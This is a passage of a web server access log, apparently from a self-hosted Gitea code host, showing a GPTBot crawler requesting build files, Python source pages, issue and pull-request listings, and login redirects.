"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11611] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" -[17/Feb/2026:18:25:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10783] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:25:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10785] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33300] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:18:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" -[17/Feb/2026:18:25:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:25:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=open&type=all" -[17/Feb/2026:18:25:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py?display=source" [Client 74.7.227.38] [Length 18225] [Gzip 5.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:18:25:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py?display=source" [Client 74.7.227.38] [Length 18811] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:18:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py?display=source" [Client 74.7.227.38] [Length 19615] [Gzip 6.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:18:25:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py?display=source" [Client 74.7.227.38] [Length 21573] [Gzip 7.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:18:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py?display=source" [Client 74.7.227.38] [Length 21127] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:18:25:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" -[17/Feb/2026:18:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py?display=source" [Client 74.7.227.38] [Length 20998] [Gzip 6.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:18:25:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:25:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:25:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:25:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:25:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build" [Client 74.7.227.38] [Length 10182] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:18:25:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=open&type=all" -[17/Feb/2026:18:25:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&state=open&type=all" -[17/Feb/2026:18:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:25:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fold_log_macros.hpp" [Client 74.7.227.38] [Length 23667] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:18:25:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13367] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13365] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:25:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" -[17/Feb/2026:18:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build" -[17/Feb/2026:18:25:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/GoldMonitor/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build" -[17/Feb/2026:18:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/GoldMonitor/build" -[17/Feb/2026:18:25:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build" [Client 74.7.227.38] [Length 38] [Gzip 